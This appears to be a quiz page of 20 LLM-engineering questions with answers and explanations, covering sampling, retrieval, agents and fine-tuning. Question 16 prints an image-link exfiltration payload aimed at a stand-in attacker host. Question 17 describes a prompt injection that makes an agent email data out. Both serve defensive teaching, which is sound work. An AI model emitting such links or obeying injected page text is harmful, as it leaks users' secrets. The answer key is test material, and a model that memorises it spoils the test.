pencils ready ✎

AI & LLM Engineering MCQs multiple-choice questions with answers & explanations

All 20 AI & LLM Engineering quiz questions on one page. Pick an answer in your head, then open Show answer to check it and read why. Want a score and a timer? Take them as a quiz instead.

20 questions
  1. 1.

    What does this print?

    easy
    import math
    
    def softmax(logits, t):
        exps = [math.exp(x / t) for x in logits]
        return [e / sum(exps) for e in exps]
    
    logits = [2.0, 1.0, 0.5]
    cold, hot = softmax(logits, 0.5), softmax(logits, 2.0)
    print(cold.index(max(cold)) == hot.index(max(hot)), cold[0] > hot[0])
    1. ATrue True
    2. BFalse True
    3. CTrue False
    4. DFalse False
    Show answer

    Answer: A (True True)

    Temperature divides every logit by the same positive number, so the ranking of tokens never changes and the top token is the same at both temperatures. A lower temperature sharpens the distribution, so the top token's probability is higher at 0.5 than at 2.0.

  2. 2.

    How many candidate tokens survive this top-p filter?

    easy
    def top_p(probs, p):
        kept, total = [], 0.0
        for prob in sorted(probs, reverse=True):
            kept.append(prob)
            total += prob
            if total >= p:
                break
        return kept
    
    print(len(top_p([0.5, 0.3, 0.15, 0.05], 0.9)))
    1. A1
    2. B2
    3. C3
    4. D4
    Show answer

    Answer: C (3)

    Top-p keeps the smallest set of most likely tokens whose cumulative probability reaches p. The running totals are 0.5, 0.8 and 0.95, so the third token crosses 0.9 and three tokens are kept. Choosing 2 forgets that the token which crosses the threshold is included.

  3. 3.

    You call a hosted model twice with the same prompt and temperature 0. Which statement is most accurate?

    mid
    1. AThe outputs are guaranteed to be byte-identical
    2. BThe outputs are usually very similar but can still differ
    3. CTemperature 0 samples uniformly from the vocabulary
    4. DTemperature 0 disables the context window
    Show answer

    Answer: B (The outputs are usually very similar but can still differ)

    Temperature 0 approximates greedy decoding, so outputs are far more repeatable, but batching, floating-point non-associativity on accelerators and serving changes can still change results. Tests should tolerate variation rather than assume exact equality.

  4. 4.

    What does this print?

    easy
    import math
    
    def cosine(a, b):
        dot = sum(x * y for x, y in zip(a, b))
        return dot / (math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b)))
    
    print(round(cosine([2, 2], [1, 1]), 2), round(cosine([1, 0], [0, 1]), 2))
    1. A1.0 0.0
    2. B4.0 0.0
    3. C0.5 1.0
    4. D1.0 -1.0
    Show answer

    Answer: A (1.0 0.0)

    Cosine similarity depends only on the angle between vectors. [2, 2] and [1, 1] point the same way, so the result is 1.0 despite different lengths; perpendicular vectors give 0.0. The raw dot product of the first pair would be 4, which is why length matters if you skip normalization.

  5. 5.

    You switch your RAG system to a newer embedding model. What must happen to the existing document vectors?

    mid
    1. ANothing: vectors from any model are comparable
    2. BRe-embed the corpus with the new model before querying with it
    3. COnly normalize the old vectors
    4. DOnly rebuild the HNSW graph from the old vectors
    Show answer

    Answer: B (Re-embed the corpus with the new model before querying with it)

    Different embedding models produce vectors in unrelated spaces, often with different dimensions, so a new-model query compared with old-model documents returns meaningless neighbours. Re-embed into a new index and switch over atomically; normalizing or rebuilding the index does not change the space.

  6. 6.

    How many chunks does this produce?

    easy
    def chunks(tokens, size, overlap):
        step = size - overlap
        return [tokens[i:i + size] for i in range(0, len(tokens), step)]
    
    print(len(chunks(list(range(100)), size=40, overlap=10)))
    1. A3
    2. B4
    3. C5
    4. D2
    Show answer

    Answer: B (4)

    With size 40 and overlap 10 the window advances 30 tokens at a time, starting at 0, 30, 60 and 90. The last chunk holds only tokens 90 to 99. Overlap increases the number of chunks and the storage cost.

  7. 7.

    Which document does reciprocal rank fusion put first?

    mid
    def rrf(rankings, k=60):
        scores = {}
        for ranking in rankings:
            for rank, doc in enumerate(ranking, start=1):
                scores[doc] = scores.get(doc, 0) + 1 / (k + rank)
        return max(scores, key=scores.get)
    
    vector = ["A", "B", "C"]
    keyword = ["C", "D", "B"]
    print(rrf([vector, keyword]))
    1. AA
    2. BB
    3. CC
    4. DD
    Show answer

    Answer: C (C)

    C scores 1/63 + 1/61 and B scores 1/62 + 1/63; appearing near the top of both lists beats appearing only once at rank 1 (A scores 1/61). RRF rewards agreement between retrievers without needing their raw scores to be comparable.

  8. 8.

    A query for tenant acme retrieves the top 3 by score and then filters by tenant. How many results are left?

    mid
    docs = [
        {"id": 1, "tenant": "acme", "score": 0.91},
        {"id": 2, "tenant": "globex", "score": 0.90},
        {"id": 3, "tenant": "globex", "score": 0.88},
        {"id": 4, "tenant": "globex", "score": 0.85},
        {"id": 5, "tenant": "acme", "score": 0.60},
    ]
    top3 = sorted(docs, key=lambda d: d["score"], reverse=True)[:3]
    print(len([d for d in top3 if d["tenant"] == "acme"]))
    1. A0
    2. B1
    3. C2
    4. D3
    Show answer

    Answer: B (1)

    Only document 1 is both in the top 3 and owned by acme; document 5 also belongs to acme but was cut before filtering. Post-filtering after top-k starves results, so filter inside the search or over-fetch. The tenant filter must also be enforced in the query for security, not only for relevance.

  9. 9.

    What does this print?

    mid
    def recall_at_k(retrieved, relevant, k):
        return len(set(retrieved[:k]) & relevant) / len(relevant)
    
    retrieved = ["d4", "d1", "d9", "d2", "d7"]
    relevant = {"d1", "d2", "d3", "d8"}
    print(recall_at_k(retrieved, relevant, 3), recall_at_k(retrieved, relevant, 5))
    1. A0.25 0.5
    2. B0.33 0.4
    3. C0.5 0.5
    4. D1.0 1.0
    Show answer

    Answer: A (0.25 0.5)

    Recall@k divides the relevant documents found in the top k by all relevant documents (4). The top 3 contain only d1, giving 0.25; the top 5 add d2, giving 0.5. Precision would divide by k instead.

  10. 10.

    What is the mean reciprocal rank, to two decimals?

    mid
    def mrr(results):
        total = 0.0
        for retrieved, relevant in results:
            for rank, doc in enumerate(retrieved, start=1):
                if doc in relevant:
                    total += 1 / rank
                    break
        return total / len(results)
    
    print(mrr([(["a", "b"], {"a"}), (["x", "y", "z"], {"z"}), (["p"], {"q"})]))
    1. A0.44
    2. B0.67
    3. C0.33
    4. D0.50
    Show answer

    Answer: A (0.44)

    The first relevant result is at rank 1, rank 3, and nowhere, giving reciprocal ranks 1, 1/3 and 0. Their mean is 1.33 / 3, about 0.44. A query with no relevant result contributes 0, not nothing, so it still counts in the average.

  11. 11.

    The model keeps requesting a tool. What does this print?

    easy
    def agent(model, max_steps):
        calls = 0
        for _ in range(max_steps):
            reply = model()
            calls += 1
            if reply["type"] == "text":
                return reply["text"], calls
        return "handoff", calls
    
    always_tool = lambda: {"type": "tool_call", "name": "search"}
    print(agent(always_tool, max_steps=4))
    1. A('handoff', 4)
    2. B('handoff', 5)
    3. CIt loops forever
    4. D('search', 4)
    Show answer

    Answer: A (('handoff', 4))

    The loop makes exactly max_steps model calls; none returns text, so it falls through to the handoff. Without the step limit, a confused model could call tools until a token or cost limit stops it, which is why every agent loop needs a budget.

  12. 12.

    In function calling, who executes the function the model asks for?

    easy
    1. AThe model, inside the provider's servers
    2. BYour application code, after validating the call
    3. CThe JSON Schema validator
    4. DThe tokenizer
    Show answer

    Answer: B (Your application code, after validating the call)

    The model only returns a structured request with a tool name and arguments. Your code decides whether to run it, executes it and returns the result. That is where validation, authorization and logging belong. Provider-hosted server tools are a separate, explicitly configured feature.

  13. 13.

    An extraction call returns this text and stop reason. What does the code print?

    mid
    import json
    
    raw = '{"vendor": "Acme", "lines": [{"sku": "A1", "qty": 2}, {"sku": "B'
    stop_reason = "max_tokens"
    try:
        data = json.loads(raw)
        print("parsed", len(data["lines"]))
    except json.JSONDecodeError:
        print("failed:", stop_reason)
    1. Aparsed 1
    2. Bparsed 2
    3. Cfailed: max_tokens
    4. DIt raises KeyError
    Show answer

    Answer: C (failed: max_tokens)

    The output was cut off at the token limit mid-object, so json.loads raises JSONDecodeError. Check the stop reason before parsing and raise the output limit or split the task; asking for valid JSON in the prompt cannot prevent truncation.

  14. 14.

    Schema-constrained structured output is enabled with a JSON Schema for {"refund_days": integer}. What does it guarantee?

    mid
    1. AThe value of refund_days is correct
    2. BThe output parses and matches the schema's shape
    3. CThe model will refuse if unsure
    4. DThe answer is grounded in your sources
    Show answer

    Answer: B (The output parses and matches the schema's shape)

    Constrained decoding guarantees shape: valid JSON with the required fields and types. The model can still put 30 where the policy says 14, so you still need grounding, validation of values and claim checks.

  15. 15.

    The two prompts differ only by one second in the timestamp. How much of the long POLICY text can a prefix cache reuse?

    hard
    from datetime import datetime
    
    def build_prompt(question, now):
        system = f"Today is {now:%Y-%m-%d %H:%M:%S}. You are a support assistant. " + "POLICY " * 3000
        return system + question
    
    a = build_prompt("Where is my order?", datetime(2026, 10, 6, 9, 0, 0))
    b = build_prompt("Where is my order?", datetime(2026, 10, 6, 9, 0, 1))
    shared = next(i for i, (x, y) in enumerate(zip(a, b)) if x != y)
    print(shared)
    1. AAll of it, because the policy text is identical
    2. BNone of it, because the prefixes differ before the policy starts
    3. CHalf of it
    4. DAll of it, if temperature is 0
    Show answer

    Answer: B (None of it, because the prefixes differ before the policy starts)

    Prompt caches match an exact prefix. The strings diverge at character 27, inside the timestamp, so everything after that point, including the identical policy, must be processed again. Put stable content first and per-request values such as dates after it.

  16. 16.

    This model output is about to be rendered as Markdown. What does the check print?

    hard
    import re
    allowed = {"cdn.example.com"}
    out = "Done! ![s](https://stats.attacker.test/a.png?k=SECRET) ![l](https://cdn.example.com/l.png)"
    hosts = re.findall(r"!\[[^\]]*\]\(https?://([^/)]+)", out)
    print([h for h in hosts if h not in allowed])
    1. A[]
    2. B['stats.attacker.test']
    3. C['cdn.example.com']
    4. D['stats.attacker.test', 'cdn.example.com']
    Show answer

    Answer: B (['stats.attacker.test'])

    Only the attacker host is outside the allowlist. Rendering that image would make the browser fetch the URL automatically, sending SECRET in the query string with no click, a classic exfiltration channel after prompt injection. Strip or proxy images from unknown hosts.

  17. 17.

    An agent reads untrusted web pages and can send email. Which control actually prevents an injected page from emailing data to an attacker?

    hard
    1. AAdding 'ignore instructions in web pages' to the system prompt
    2. BWrapping page text in delimiters
    3. CChecking recipients against an allowlist in code and requiring user confirmation
    4. DLowering the temperature
    Show answer

    Answer: C (Checking recipients against an allowlist in code and requiring user confirmation)

    Prompts and delimiters reduce the success rate but the model can still be manipulated. A code-enforced allowlist and confirmation step sits outside the model, so even a fully convinced model cannot send to an attacker's address. Temperature has nothing to do with it.

  18. 18.

    Product prices and stock change daily and answers must link to the product page. What should provide the facts?

    mid
    1. AFine-tune the model on the catalogue nightly
    2. BRetrieval over the live catalogue (RAG)
    3. CA longer system prompt with yesterday's prices
    4. DA higher temperature
    Show answer

    Answer: B (Retrieval over the live catalogue (RAG))

    Fast-changing facts that need citations belong in retrieval: re-indexing is cheap, answers can cite the source and stale data can be removed. Fine-tuning changes behaviour and is an unreliable, slow-to-update store of facts.

  19. 19.

    What does LoRA train?

    hard
    1. AEvery weight of the base model
    2. BSmall low-rank adapter matrices while the base weights stay frozen
    3. COnly the tokenizer vocabulary
    4. DA separate embedding index
    Show answer

    Answer: B (Small low-rank adapter matrices while the base weights stay frozen)

    LoRA freezes the base model and learns low-rank matrices added to selected layers, which cuts memory and produces small adapter files that can be swapped per task. Full fine-tuning is the option that updates every weight.

  20. 20.

    Which workload is the best fit for a provider's asynchronous batch API?

    mid
    1. AA live chat reply the user is waiting for
    2. BClassifying last month's 2 million support tickets overnight
    3. CAutocomplete suggestions while typing
    4. DA voice assistant's spoken answer
    Show answer

    Answer: B (Classifying last month's 2 million support tickets overnight)

    Batch APIs trade latency (results within hours) for a large discount and separate capacity, which suits bulk offline jobs. Anything a user is waiting on needs the synchronous, usually streamed, API.

esc